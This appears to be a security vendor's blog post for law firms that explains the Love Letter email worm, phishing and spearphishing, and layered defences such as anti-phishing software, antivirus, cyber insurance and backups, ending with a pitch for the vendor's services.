Social engineering has many forms. One of the oldest chain malware schemes ever, known as ‘Love Letter’, spread virally through a malicious email attachment. A potential victim would receive an email asking them to open a ‘love letter’ attached as a file, and usually from someone they knew: Love Letter worked by grabbing someone’s entire email contact list and then mass-emailing them copies of the virus, while it stole passwords off of infected computers and destroyed everything else.
Since the sending email was ‘familiar’ and the file type wasn’t the sort of thing most people looked at yet, a truly absurd number of devices became infected this way! Estimates place it at over a million. That’s a million devices that had their data destroyed and all of their passwords stolen.
That is to say, it’s a scam that a ton of people haven fallen for and will continue to fall for, because it bypasses the warning signs most people are trained to look for. It wasn’t a typical phishing scam: the English was decent, without any typos, and it came from someone the sender likely knew well enough to recognize the address for. The file – and maybe an uncharacteristic email when things like ‘email etiquette’ were still being shaken out – were the only potential flags something was off. Even once someone realized what happened, that person might not remember everyone in their list, or have too large a list to effectively warn everyone on it before the emails were sent, and the chain grew longer.
Offices that regularly receive emails with documents attached, like law offices, are more vulnerable to this particular scam!
Ways to Protect Against It
The problem with phishing is that even trained employees can become fatigued and not notice the subtle red flags of a stolen address or an incorrect file type, especially if they’re regularly dealing with every sort of file type imaginable as they try to compile the paperwork they need to do their job. Worse, the ordinary documents are also becoming a regular threat, as .xlsx and .docx files can support executables (which is where the X at the end of those file extensions come from) which, while not malware themselves, can open the door to malware by running programs that open links with automatic downloads.
Can training really stop this?
The old advice was that scammers would misspell words and make their email look bad on purpose because it weeded out people who’d eventually figure out the scheme from the very beginning. While those still exist, they’re not really the kind of scam that people trying to phish law firms are using. Instead, a combination of more refined tactics are usually what’s in play: they have a specific target, and they don’t want them getting away. A well-written phishing email designed using the scam standards (there’s a rush, you’re in trouble, etc.) might slip past without raising any red flags at all.
Spearphishing is another tactic. Where regular phishing is designed to be vague enough that a simple dynamic field in the email is all that’s needed to send it off, a spearphishing email is highly personalized. Data that was compromised elsewhere is put to use like this. Emails that are almost correct with contact information that is completely correct, featuring a footer or signature line that matches perfectly to what that person normally uses, are much tougher to spot than the average phishing email. The scammer who sent it knows what the person receiving the email is expecting and is putting in substantial effort to match it.
It’s the difference between net dragging to fish and using a hook with bait on it. Scammers know the net dragging is going to get them a lot of sardines, but if they want the big tuna, they’ve got to pull out all the stops to do it. Law firms are a big tuna. The data is valuable, and losing it has serious consequences!
The Swiss Cheese Model
Regular refreshers and support software (think programs like Ironscales, which will pull phishing attempts and flag concerning messages) can help prevent failures due to human error or a truly incredible phishing message. This follows the ‘Swiss Cheese’ model of software safety, where the layers of security stack like layers of swiss cheese so no threat can get through all of them, because the holes don’t overlap.
Say an employee gets an email. This email is a phishing email, but the employee doesn’t know that: it’s disguised too well for them to notice what it is. They open it, and at this point a program like Ironscales might notify them that this is the first time they’ve received an email from this address, and so they take a closer look at the address, realize it’s copying someone else’s, and delete it.
However, it might not do this if the address was stolen, and therefore valid. Assuming the person whose address was stolen isn’t able to warn ahead, the employee opens the email, reads it, and finds nothing wrong. They go to download the attachment from the email, and it’s flagged as a malicious file type by the built-in Windows antivirus, which recognized it because it’s up-to-date.
Well, what if that doesn’t stop them? What if they sent an .XLSX, or the employee clicked ‘download anyway’? That would be bad – a malicious file is now on the computer. However, a sufficiently advanced antivirus on top of the Microsoft one would be able to isolate a malicious file by behavior.
Well, say the malicious file wasn’t isolated because there was no antivirus capable of doing that. The ideal situation in that case is cyber insurance (because malicious files are rarely just locking data up today, they often steal it too for reselling elsewhere, so your clients may have lost data) combined with a sturdy backup system that will allow the computer to be fully wiped and then restored while losing less than a week’s worth of data.
There are several points where all but the most determined employee will be told to stop, analyze what they’re looking at, consider if the file or email could be fraudulent, and then remove it from their inbox. Then, several automated systems are tasked with identifying and isolating a threat. This is the Swiss Cheese model!
We Can Help
If this seems daunting, it doesn’t have to be. Setting up a Swiss-Cheese or layered model of security can be difficult, but we’re here to help! We vend enterprise software and monitor alerts thrown by that software when potentially risky files are accessed or when suspicious movements are detected. We vend mailbox protection, and can even manage Microsoft rules to black- or white-list particular addresses, as needed. We also offer training on top of enterprise anti-phishing software to ensure employees have the best possible chance of preventing a malware event by phishing.
Many businesses don’t look at prevention – they start looking for cures after an event has already happened, and by then it’s too late! Data, which can be endlessly replicated across computers, is as good as everywhere once it’s stolen, and without a backup, ransomware can wipe years and years of progress. If you’re worried about your law firm being struck by malware, now is as good a time as any to contact us and see about keeping your data as secure as possible.
